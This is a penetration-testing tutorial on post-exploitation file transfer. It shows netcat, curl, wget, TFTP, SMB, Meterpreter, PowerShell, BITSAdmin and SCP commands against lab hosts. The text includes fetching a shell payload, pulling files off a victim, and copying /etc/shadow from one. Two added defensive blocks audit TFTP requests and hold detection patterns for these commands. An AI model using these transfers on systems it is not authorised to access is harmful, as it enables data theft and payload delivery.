
Comprehensive Guide on File Transfer (Post Exploitation)
In penetration testing, we often get stuck when we need to transfer or download a file from a
compromised machine or another host machine in a network. Therefore, today you will learn
which methods you can follow for downloading any file from a compromised or another host
system. All of the following methods are helpful in penetration testing and are also used for
general purposes.
Let’s start!!
File Transfer Protocol (FTP)
You are all familiar with the working of an FTP server, so let’s start today’s tutorial with the
FTP service.
When you find that port 21 is open, it means the FTP service is running on the remote machine.
If you want to download a text file from the destination machine, you can follow either of the
2 methods below.
1st method: use the command line
First, connect to the FTP server using the host IP, enter the login credentials and then
execute the get command with the name of the file you want to download.

ftp 192.168.1.106
get raj.txt

www.hackingarticles.in 1 www.ignitetechnologies.in
2nd method: use the browser
The same job can be done in the browser by entering the host IP in the URL
as ftp://192.168.1.106, entering the username and password for authentication and downloading
your file.

Install Python FTP server
Many people prefer the vsftpd server for sharing a file over port 21, as done above, but if
vsftpd does not suit you then you can go with the 2nd option, “Python FTP server”, which also
allows sharing of files through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access to only a particular folder “aarti” for sharing its data. pyftpdlib
shares the directory it is started from, so the command is run from inside that folder.

sudo python -m pyftpdlib -p 21

So when the host machine enters the destination address “ftp://192.168.1.103” in the URL, it
gets an anonymous login and can download the file.

Hypertext Transfer Protocol (HTTP)


Sharing a file through the web directory “html”
Another well-known service for file transfer is HTTP, which uses port 80. The Apache service
must be running on your machine to transfer files through web directories; you can then move
any file into the html directory to share it over HTTP.
Here we copy the putty.exe file into html with the following command.

cp putty.exe /var/www/html

Now let’s download putty.exe to our machine from the destination server. Open your favorite
browser and browse to the file through the server address 192.168.1.106/putty.exe in the URL.
With this technique you can access any file inside the web directory, i.e. /var/www/html, of the
destination machine.

Sharing through Python HTTP server
If the above HTTP method does not suit you, then choose the 2nd option, “Simple Http
server”, which is also a Python script that uses port 80 to share a file in a network through a
web browser.
Here again, I want to give access to only a particular folder “demo” for sharing its data.
SimpleHTTPServer serves the directory it is started from, so the command is run from inside
that folder.

python -m SimpleHTTPServer 80

So when the host machine enters the destination address “http://192.168.1.108” in the URL, it
gets access to the shared folder and can download the file.

HFS Tool
In the above HTTP file sharing method we used Ubuntu and Linux to transfer a file
over port 80 and allowed another host machine to download it through a web browser.
If you are a Windows user, you can use the HFS tool for the same job. It is the
most popular tool used for file transfer between different platforms.
Steps:
▪ Download HFS and run the application.
▪ Now drag and drop the file you want to share through the web browser.

Now when the user of another host machine opens the Windows IP as the
URL http://192.168.1.105 in their web browser, they can download the shared file.

Netcat
Netcat is known as the Swiss Army knife because it is used for multiple purposes, so we are
going to use it for file transfer.

Use the following command to download the shared file from the destination server.
Syntax: nc [options] [listening port] > [path to store downloaded file]

nc -lvp 5555 > /root/Desktop/raj.txt

Type the following command to share any file with the host machine in the network.
Syntax: nc host IP host port < file.txt

nc 192.168.1.108 5555 < raj.txt

Now you can observe that we have successfully downloaded the raj.txt file to the desktop of
our host machine.

Curl
Curl is a command-line tool for transferring data using various protocols. It is also used to
download data from any website or host machine; the following command will download
the putty.exe file from the website.

curl -O http://192.168.1.106/putty.exe

Similarly, execute the command below to download putty from the WWW.

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

Wget

Execute the command below to download a particular file. The downloaded file is stored in
the current directory. Wget shows the download progress, size, date and time while
downloading the file.
Enter the command below to download any file from the html directory of the Apache server.

wget http://192.168.1.106/putty.exe

Similarly, execute the command below to download putty from the WWW.

wget https://the.earth.li/~sgtatham/putty/latest/putty.exe

Trivial File Transfer Protocol (TFTP)


The TFTP service is used to read and write files over a remote connection. It uses UDP port 69
for sharing files and does not use authentication, hence it is less secure than FTP.
Here I had created a demo.txt file inside the tftp folder for sharing.

Metasploit contains a module that provides a TFTP service for file sharing.

use auxiliary/server/tftp
msf auxiliary(server/tftp) > set srvhost 192.168.1.108
msf auxiliary(server/tftp) > set TFTPROOT /root/tftp
msf auxiliary(server/tftp) > exploit

Now open a command prompt and execute the command below to download the
demo.txt file to your system.
Syntax: tftp -i host IP GET file name.txt

tftp -i 192.168.1.108 GET demo.txt

As you can observe from the image below, the downloaded file is stored in the current directory.
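
Because TFTP has no authentication, the request packet itself is the only record of who asked for which file. The parser and audit helper below are an added example, not part of the original guide: the packet layout follows RFC 1350, while the function names, the sample source address and the payloads are constructed for illustration.

```python
import posixpath
import struct

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}  # RFC 1350


def parse_tftp(payload: bytes) -> dict:
    """Decode one TFTP UDP payload; raise ValueError if it is malformed."""
    if len(payload) < 4:
        raise ValueError("payload too short for TFTP")
    opcode, number = struct.unpack("!HH", payload[:4])
    name = OPCODES.get(opcode)
    if name is None:
        raise ValueError(f"unknown TFTP opcode {opcode}")
    if name in ("RRQ", "WRQ"):
        # filename NUL mode NUL [option NUL value NUL]... ; no credential field
        if not payload.endswith(b"\x00"):
            raise ValueError("request is not NUL-terminated")
        fields = [f.decode("ascii", "replace") for f in payload[2:-1].split(b"\x00")]
        if len(fields) < 2 or len(fields) % 2:
            raise ValueError("expected filename, mode and paired options")
        return {"op": name, "filename": fields[0], "mode": fields[1].lower(),
                "options": dict(zip(fields[2::2], fields[3::2]))}
    # number is the block number for DATA/ACK and the error code for ERROR
    return {"op": name, "number": number, "length": len(payload) - 4}


def audit(packets):
    """Return one record per read/write request sent to UDP port 69."""
    records = []
    for src, payload in packets:
        try:
            pkt = parse_tftp(payload)
        except ValueError:
            continue  # not TFTP, or a truncated capture
        if pkt["op"] in ("RRQ", "WRQ"):
            path = posixpath.normpath(pkt["filename"].replace("\\", "/"))
            outside = path.startswith(("/", "../")) or path == ".."
            records.append((src, pkt["op"], pkt["filename"], pkt["mode"], outside))
    return records


# Constructed payloads (not captured traffic): an octet-mode RRQ and a WRQ with a parent path.
SAMPLE = [
    ("192.168.1.105", b"\x00\x01demo.txt\x00octet\x00"),
    ("192.168.1.105", b"\x00\x02../notes.txt\x00netascii\x00"),
]

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

The last element of each record is True when the requested path is absolute or climbs above the TFTP root, which is worth reviewing on any server exposed on UDP 69.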

SMB Server using Python script


Now we will use a Python script that activates the SMB service on our Linux machine. You can
visit GitHub for this Python script.

I copied the Python code from GitHub and pasted it into a text file as smbserver.py in the desktop
folder. Now execute the command below for a shared folder “raj”.

python smbserver.py raj /root/share

Downloading the file from Linux SMB server in Windows Machine


Since we know the SMB service is running on host machine 192.168.1.108 and we are on the
Windows platform, we can access its shared folder through the Run command prompt.

Hence you can observe that we have successfully accessed the folder “raj” and found two text
files, user and pass, in it.
In this way, we can use the SMB Python script for sharing files between Windows and Linux machines.

Downloading the file from Linux SMB server in Ubuntu Machine
If you are an Ubuntu user then you can use smbclient to access the shared folder of the SMB
server.

apt-get install smbclient

Now execute the command below to list the shared folders of the server.

smbclient -L 192.168.1.108

From the image below you can observe that the shared folder is “RAJ”.

Now execute the command below to access the shared folder raj and download the data
present inside it.

smbclient //192.168.1.108/raj

Since the folder raj has two text files, user.txt and pass.txt, we are going to download
user.txt with the command below.
get user.txt

Download file through Meterpreter


In penetration testing, when we compromise a target machine and obtain a meterpreter session
on it using Metasploit, we can execute the following command inside meterpreter to
download any file from the victim’s machine.

meterpreter> download raj.txt /root/Desktop/

Use Cat command


cat is a very beautiful command and can do a remarkable job if you use it wisely.
Suppose you found a text file on the host machine and you are unable to download it; then open
that file with the cat command.
For example, I want to know the text inside user.txt, so I will execute the following command,
then copy that text into a new text document and save it on our machine.

Download file using Windows PowerShell

If you are a Windows user and have command shell access then you can choose PowerShell
to download any file from a web server. Execute the command below in a command prompt as
administrator.
PowerShell

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.106/putty.exe','d:\data\putty.exe')

From the image below you can observe that we have successfully downloaded putty.exe to the d: drive.

Download file using BITSAdmin


BITSAdmin is a command-line utility for the Windows platform that allows the user to download
and upload files. If you want to download any file over HTTP then you can use the following
command. Like PowerShell, it works under admin privileges. Therefore run cmd as
administrator and execute the command below to download putty.

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe

It will now start downloading and show updates during the download, such as job type (i.e.
downloading), priority and status.

From the image below you can observe that we have downloaded putty.exe to the f: drive.

Sharing File through PHP File Server
PHP is also available for the same purpose when the above methods are not suitable for
sharing a file between two hosts. You need to execute the following command to turn on the
HTTP listener. As you know, I have saved a shell script on the Desktop, therefore, we are
running the command below on the Desktop.

php -S 0.0.0.0:80

Now you can use wget or another application to download the shell script from the remote
address, i.e. 192.168.1.103/shell.elf

SCP File Transfer


Secure copy protocol (SCP) is a means of securely moving files between a local host and a
remote host or between two remote hosts. It is based on Secure Shell (SSH). Here I have
created a new file scp.txt inside /home/raaz and then try to transfer this file to a remote
machine with the help of the following command.
Syntax: scp SourceFile user@host:~/path of the directory

scp scp.txt aarti@192.168.1.105:~/

Now let’s confirm the transfer by inspecting the remote directory; as you can observe,
we have successfully received the scp.txt file on our remote PC.
Similarly, we can transfer any backdoor from the attacker machine to the victim’s machine or
copy some system files such as /etc/passwd and /etc/shadow from the victim’s machine.
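
The commands used throughout this guide leave recognisable process command lines, which is what a defender matches on. The sketch below is an added example, not from the original guide: the rule names, the expected_hosts allowlist and the sample events are assumptions constructed for illustration, and the patterns cover only the command forms shown above.

```python
import re
from urllib.parse import urlsplit

# (rule, regex) pairs; the group "remote" captures a URL or host when one is named.
RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("bitsadmin-transfer", r"\bbitsadmin(\.exe)?\s+/transfer\b.*?(?P<remote>https?://\S+)"),
    ("webclient-downloadfile", r"net\.webclient\)?\.downloadfile\(\s*['\"](?P<remote>[^'\"]+)"),
    ("tftp-get", r"\btftp(\.exe)?\s+-i\s+(?P<remote>\S+)\s+get\s"),
    ("curl-wget", r"\b(curl|wget)(\.exe)?\s+(-\S+\s+)*(?P<remote>(https?|ftp)://\S+)"),
    ("netcat-listener", r"\b(nc|ncat|netcat)(\.exe)?\s+-[a-z]*l[a-z]*\s"),
    ("adhoc-file-server", r"\bpython\S*\s+-m\s+(simplehttpserver|http\.server|pyftpdlib)\b"
                          r"|\bphp\S*\s+-s\s+\S+"),
]]


def remote_host(value):
    """Reduce a URL or bare host to its host part; None when no remote is named."""
    return urlsplit(value).hostname if value and "://" in value else value


def classify(cmdline):
    """Return (rule, remote_host) for every rule the command line matches."""
    return [(name, remote_host(m.groupdict().get("remote")))
            for name, rx in RULES if (m := rx.search(cmdline))]


def scan(events, expected_hosts=frozenset()):
    """events: (machine, cmdline) pairs. Drop hits whose remote host is expected."""
    return [(machine, rule, host)
            for machine, cmdline in events
            for rule, host in classify(cmdline)
            if host not in expected_hosts]


# Constructed process-creation events (not real logs), built from this guide's commands.
EVENTS = [
    ("WIN-LAB", r"powershell (new-object System.Net.WebClient)"
                r".DownloadFile('http://192.168.1.106/putty.exe','d:\data\putty.exe')"),
    ("WIN-LAB", r"bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe"),
    ("WIN-LAB", "tftp -i 192.168.1.108 GET demo.txt"),
    ("LNX-LAB", "python -m SimpleHTTPServer 80"),
    ("LNX-LAB", "nc -lvp 5555"),
    ("LNX-LAB", "curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe"),
    ("LNX-LAB", "apt-get install smbclient"),
]

if __name__ == "__main__":
    print(*scan(EVENTS, expected_hosts={"the.earth.li"}), sep="\n")
```

Listener and ad hoc server hits carry no remote host, so they are never suppressed by the allowlist and always surface for review.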

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information
Security Consultant, Social Media Lover and Gadgets.
